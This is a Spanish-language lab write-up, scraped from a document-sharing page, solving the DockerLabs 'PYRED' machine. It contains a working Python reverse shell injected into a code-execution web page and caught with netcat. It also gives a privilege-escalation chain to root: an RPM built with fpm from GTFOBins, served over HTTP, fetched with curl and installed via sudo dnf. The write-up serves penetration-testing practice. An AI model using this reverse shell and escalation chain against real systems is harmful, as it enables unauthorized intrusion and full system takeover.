0% encontró este documento útil (0 votos)
7 vistas8 páginas

Explotación de PYRED en DockerLabs

Cargado por

SilvinaAB
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd
0% encontró este documento útil (0 votos)
7 vistas8 páginas

Explotación de PYRED en DockerLabs

Cargado por

SilvinaAB
Derechos de autor
© All Rights Reserved
Nos tomamos en serio los derechos de los contenidos. Si sospechas que se trata de tu contenido, reclámalo aquí.
Formatos disponibles
Descarga como PDF, TXT o lee en línea desde Scribd

-----------------------------------------------------------------------------------------------------------

PYRED - DockerLabs
-----------------------------------------------------------------------------------------------------------
▪ LINK: [Link]
MHFl1JgS#HHZoCOv8d8Cne4AKUHRchI9IXGX-4OA2FjntN8QG7rw

• Para iniciar la maquina ejecutamos el siguiente comando:


sudo bash auto_deploy.sh [Link]

◇ Comprobamos la conexión con la maquina haciendo un ping


Habiendo hecho esto, comenzaremos la explotación de la máquina.

1/8
++++++++++++++++
ENUMERACIÓN
++++++++++++++++

Hacemos un escaneo básico donde buscaremos los puertos abiertos,


y lo que podamos encontrar para hacer el ataque de manera exitosa.

sudo nmap -sS [Link]



• Hay un único puerto abierto que es el 5000, procedemos a abrirlo en el navegador


◇ Notamos que es una pagina donde podemos ejecutar codigo en Python y esto
es un gran vectorde ataque
Ya que podriamos inyectar código malicioso

2/8
++++++++++++++++
EXPLOTACIÓN
++++++++++++++++

• Al ver que es el único puerto abierto, y ver el tipo de entrada que tiene, podemos
hacer una Reverse Shell
◇ En este caso usaré una extensión de navegador llamado Hack-Tools - https://
[Link]/LasCC/Hack-Tools

◇ Copiamos el código y formateamos para que pueda ser interpretado


3/8
import socket,subprocess,os

s = [Link](socket.AF_INET, socket.SOCK_STREAM)
[Link](("[Link]", 4443))
os.dup2([Link](), 0)
os.dup2([Link](), 1)
os.dup2([Link](), 2)
p = [Link](["/bin/sh", "-i"])

◇ Al final del código agregamos la siguiente linea y eliminamos el pty.


▪ p = [Link](["/bin/sh", "-i"])
• En nuestra maquina atacante abrimos NetCat para ponerlo en escucha y obtener
la reverse
sudo nc -lnvp 4443

◇ Importante es que tenemos que poner el mismo puesto del codigo en python
para poder obtener la conexión
• Al ejecutar notamos que hemos obtenido la conexión y ahora si, estamos dentro
de la maquina

4/8
++++++++++++++++
POST-EXPLOTACIÓN
++++++++++++++++

• Ejecutamos el siguiente comando:


sudo -l

▪ El comando sudo -l se usa para listar los comandos que un usuario específico
tiene permiso para ejecutar con sudo en un sistema Unix o Linux.
Cuando lo ejecutas, muestra una lista de los comandos que puedes correr con
privilegios elevados y las condiciones bajo las cuales puedes hacerlo.

• Para poder abusar de este privilagio podemos visitar la página GTFObins - https://
[Link]/

5/8
TF=$(mktemp -d)
echo 'id' > $TF/[Link]
fpm -n x -s dir -t rpm -a all --before-install $TF/[Link] $TF

◇ Copiamos los comandos marcados dentro de la maquina ATACANTE, ya que
esta nos generará un archivo
que luego ejecutaremos en la maquina VICTIMA.

•Tenemos que tomar en cuenta que primero debemos instalarnos “fpm”, porque
sino nos va a generar un error
sudo gem install fpm


◇ Ejecutamos los comandos por GFTObins

• Abrimos un server para poder compatir el archivo generado dentro de la maquina


victima
python3 -m [Link] 80

6/8

• Con el comando curl traemos el archivo dentro de nuestra máquina victima


curl [Link]/[Link] -o [Link]

▪ -o nos permite guardar el archivo con el nombre que deseemos en este caso
lo llame [Link]

• En GTFObins en la segunda seccion nos mostraba un comando para ejecutar ya


teniendo el archivo


◇ Vamos a ejecutarlo dentro de la maquina victima, solo con una variación,
usaremos la ruta completa
que nos muestra al ejecutar el comando sudo -l y el nombre de nuestro archivo

sudo -u root /usr/bin/dnf install -y [Link]



7/8
◇ Esperamos a que se complete la descarga y ejecutamos el comando:
bash -p

Y listo, hemos obtenido acceso como usuarios Root dentro de la máquina.

[Link]

8/8

También podría gustarte